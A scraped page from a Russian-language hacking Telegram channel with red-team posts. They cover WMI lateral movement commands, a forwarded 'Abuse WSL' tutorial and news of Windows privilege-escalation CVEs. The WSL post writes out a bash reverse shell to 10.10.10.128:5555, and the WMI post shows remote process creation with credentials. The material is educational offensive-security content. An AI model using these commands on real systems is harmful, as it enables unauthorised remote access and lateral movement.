Похек

Боковое перемещение: WMI

Windows Management Interface (WMI) одна из самых старых технологий управления Windows. Для взаимодействия использует RPC на 135 порту и требует привилегии локального администратора.

WMI позволяет запускать процессы на удаленном хосте. Можно воспользоваться утилитой wmic. И хотя Microsoft сообщало, что утилита будет удалена из операционной системы она еще встречается.

wmic /node:comp.domain.local /user:domain\user /password:Qwerty123 process call create "C:\Windows\System32\calc.exe"

Или использовать cmdlet Get-WmiObject

$process = Get-WmiObject -query "SELECT * FROM Meta_Class WHERE __Class = 'Win32_Process'" -namespace "root\cimv2" -computername comp1
$results = $process.Create( "calc.exe" )

Встроенные в Windows средства не позволяют получить интерактивную оболочку и удобнее использовать другие механизмы RDP и PSRemoting или воспользоваться сторонними утилитами, которые предоставляют интерактивный режим, например, wmiexec, invoke-wmiexec, wmishell и другие.

С моей точки зрения WMI не самый удобный механизм для бокового перемещения, но это отличный инструмент для сбора информации на удаленном хосте. Например, аналог команды netstat будет следующим:

Get-WmiObject -Namespace ROOT\StandardCIMV2 -Class MSFT_NetTCPConnection -ComputerName comp| Select-Object LocalAddress, RemoteAddress, RemotePort, State

#Внутрянка #RedTeam #PurpleTeam

🔥3

644 viewsАртем, 15:31

Похек

Windows_Privileges.png

3.1 MB

Windows Privileges

#попросьбампросящих

🔥3

638 viewsАртем, 15:40

Похек

Forwarded from Monkey Hacker

Abuse WSL

#RU

Windows Subsystem for Linux (WSL) - по факту данная функция в Windows, дает доступ к компактной версии файловой системе Linux, т.е мы можем выполнять практически любые команды Linux в Windows.
И естественно благодаря данной функции мы можем выполнить различные хитрости, которые нам недоступны как обычному пользователю, но можем выполнить в пределах нашего шелла. Нужны самые стандартные права пользователя, но важно, чтобы мы смогли выполнить wsl --install для включения данного функционала.
Потом убеждаемся, что данный функционал действительно работает и смотрим, доступен ли нам какой-либо дистрибутив Linux (по стандарту там будет Ubuntu)

#EN

Windows Subsystem for Linux (WSL) - in fact this function in Windows, gives us access to a compact version of the Linux file system, i.e. we can execute almost any Linux command in Windows.
And of course with this feature we can do all sorts of tricks which we can't do as a normal user but we can do within our shell. We need the most standard user rights, but it is important that we can run wsl --install to enable this feature.
Then we make sure that this feature really works and check if any Linux distro is available for us (by default this would be Ubuntu)

wsl --list --running

#RU

Если все ок, то проверьте, что у вас есть еще доступ к bash оболочке (bash.exe). Обычно он имеет путь следующий:
C:\Windows\system32\bash.exe

#EN

If everything is ok, check that you have access to the bash shell (bash.exe). It usually has the path as follows:
C:\Windows\system32\bash.exe

Начинаем с базового | Starting with basic

wsl.exe "whoami"

OR

bash.exe -c "whoami"

Если ответ видим root, то можно попробовать rev-shell | If the answer is root, you can try rev-shell

bash.exe -c "bash -i >& /dev/tcp/10.10.10.128/5555 0>&1"

#RU

P.S если что то это не тот же самый root, который есть в виндовой тачке, однако мы можем выполнять теперь те действия, которые изначально нам не были доступны

#EN

P.S it is not the same as root, which is in the wind machine, but we can now do things that were not originally available to us

#RU

Мы можем выполнять/модифицировать различные бинари на основной машине

#EN

We can run/modify different binary on the main machine

wsl.exe -e /mnt/c/Windows/System32/NeTrojan.exe

Have fun 👀

Please open Telegram to view this post

VIEW IN TELEGRAM

619 viewsСергей Зыбнев, 16:16

Похек

День Винды получается )

🫡10🤝2

670 viewsАртем, 17:03

Похек

Forwarded from Private Shizo

urbandoor.cs

7.9 KB

🔥Minimal PoC code for Kerberos Unlock LPE (CVE-2023-21817)

601 views18:58

Похек

Forwarded from Private Shizo

💥Nokoyawa ransomware attacks with Windows zero-day
In February 2023, Kaspersky technologies detected a number of attempts to execute similar elevation-of-privilege exploits on Microsoft Windows servers belonging to small and medium-sized businesses in the Middle East, in North America, and previously in Asia regions.

This is the one bug(CVE-2023-28252) under active attack this month, and if it seems familiar, that’s because there was a similar 0-day patched in the same component just two months ago. To me, that implies the original fix was insufficient and attackers have found a method to bypass that fix. As in February, there is no information about how widespread these attacks may be. This type of exploit is typically paired with a code execution bug to spread malware or ransomware.

❤1

629 views18:58

Похек

Forwarded from Private Shizo

624 views18:58

About

Blog

Apps

Platform